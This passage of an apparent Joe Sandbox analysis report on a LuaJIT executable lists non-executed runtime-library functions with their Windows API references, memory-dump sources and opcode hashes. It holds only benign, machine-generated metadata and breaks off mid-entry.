                                                                                                                                                                                                                              • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                                                                              • Instruction ID: e484ca7dd5e9f18313008ab18c7226bf1769670a7f6cfa3ce4043344225b93aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97D0C932A28F8081D744EB17F88510AB7A4FBD5780F909425EADE52A28DF3CC1A98F40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF77246A03C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF77245A9A0: GetLastError.KERNEL32(?,?,?,00007FF77245CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF77245CDA3), ref: 00007FF77245A9AF
                                                                                                                                                                                                                                • Part of subcall function 00007FF77245A9A0: SetLastError.KERNEL32(?,?,?,00007FF77245CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF77245CDA3), ref: 00007FF77245AA4D
                                                                                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF77246A0A9
                                                                                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF77246A0E4
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF77245717C), ref: 00007FF77246A129
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF77245717C), ref: 00007FF77246A151
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                              • API String ID: 2136749100-905460609
                                                                                                                                                                                                                              • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                                                                              • Instruction ID: 1af07e34135bca8cf8e346e0645c88a02ba0a2026d57190a8b970423198f8f78
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59917F73A39B5282E720AF23D4002B9A3A4AB44B88F944131DA6D47785DFBDED51CB25
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77246AA70 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3939093798-0
                                                                                                                                                                                                                              • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                                                                              • Instruction ID: 68c47d44d11a8d47dab6af1fc5ec1d0bbcd94461b52d49d963da650fceb9085b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F718163B34A2246FB10BB62D8506B8A3B1BF44B48F844136CE2D57785DFBCAC44CB65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242D9D4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                                                                              • Instruction ID: fbac6473d92bb664e34d9b7c2f6e136b8b8a2890bf8db7db9bbc8609f964dcb3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4313E73629B8185EB60AF62E8403E9B3B4FB44744F84443ADA5D57B98DF78D948CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724629E0 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 435049134-0
                                                                                                                                                                                                                              • Opcode ID: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                                                                                                                                                                                              • Instruction ID: a5db81f5e4c96b7dcce44138572eae52a8a33de9348f7248cf6bdd0ec901c90e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9bb82080360fa38c87216f357e5cc06e720d9d5a5b86dd3aaa06d23e79570f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4B1E363B3864256E720FF23D8415B9A360BB84788F844135EE6C47A95DFBCEC41CB24
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772454828 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1405656091-0
                                                                                                                                                                                                                              • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                                                                              • Instruction ID: f8561cc33c42b03f5c4173b27d6415eea132b630fe800f205fa89bf398c3b848
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4191D6B3B246864BEB58DF27C9013A8A295EB44788F948035DE5D4F789EF7CE841CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772458900 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                                                                              • Instruction ID: a5efdae6de889c6e02bb9efaed9a975865c460037a4c57d41a9d134a9671136a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B316533624B8186DB60DF26E8402ADB3A0FB88794F900135EAAD43B59DF7CD945CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77240AD60 Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::rsfun
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3764944385-0
                                                                                                                                                                                                                              • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                                                                              • Instruction ID: 0a291937e9d7600a0dd074fc687395f3d6783fa8070f7e60a6d1c2f9afb6f5c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A802C3336286458BD770DB1AE48072EB7E0F788744F504265FA9E87B99DA7CE980CF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245C47C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1443284424-0
                                                                                                                                                                                                                              • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                                                                              • Instruction ID: ede9c4678a9c7b50ca862bf46cfa3a9f346db0bb27d4d9844d7acaba69b11dbb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAE10473B386818AE710DB66D0401ADBBB1FB447C8F904135DEAE57B99CE78D916CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772462C74 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF772462CA2
                                                                                                                                                                                                                                • Part of subcall function 00007FF7724623E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7724623F4
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF772462CB3
                                                                                                                                                                                                                                • Part of subcall function 00007FF772462380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF772462394
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF772462CC4
                                                                                                                                                                                                                                • Part of subcall function 00007FF7724623B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7724623C4
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459294: HeapFree.KERNEL32(?,?,?,00007FF772468C78,?,?,?,00007FF772468FFB,?,?,00000019,00007FF7724696D0,?,?,?,00007FF772469603), ref: 00007FF7724592AA
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459294: GetLastError.KERNEL32(?,?,?,00007FF772468C78,?,?,?,00007FF772468FFB,?,?,00000019,00007FF7724696D0,?,?,?,00007FF772469603), ref: 00007FF7724592BC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF772462ED0), ref: 00007FF772462CEB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                                                                              • Instruction ID: 7dac612790d069671f39fbca6f85b5ad279a114050db5b0bf3995cc1cdbb6d93
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e26427f5b20f62ba883876fd1f06ab4d7f91d3ecd8fd6feb52cbceae43215d72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59617373A3864256E720FF23E8815B9A360BB48788F844135EA6D47695DFBCE840CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724628FC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                                                                                                                                                                                              • Instruction ID: 593e47a389f1c96b3d71f18f10be1e9bcc0ecc2e04da643ead134a47865882cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c7f8f1d2cf675da5ae5473346d47931a08e1ba11d2448201601eda58c2183d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5491D2A3F3825256E720EF27840027AA751EB80BD8F944131EEAC07A95DFBDDC81CB55
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocaletry_get_function
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2200034068-2904428671
                                                                                                                                                                                                                              • Opcode ID: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                                                                                                                                                                                              • Instruction ID: c11e783480de449f4adc43c0f4491846787466aa516e8769be804a440ab6e7ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8adcd7e54948543df789bc64a85044cfa450465654c10d4f6e6755c4c701500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06014F26B28B4281E711BB17A8404AAE660EB95BD0F984035DE7C27B55CEBCDA01CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C88E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage_free_nolock
                                                                                                                                                                                                                              • String ID: system error %d
                                                                                                                                                                                                                              • API String ID: 3491801694-1688351658
                                                                                                                                                                                                                              • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
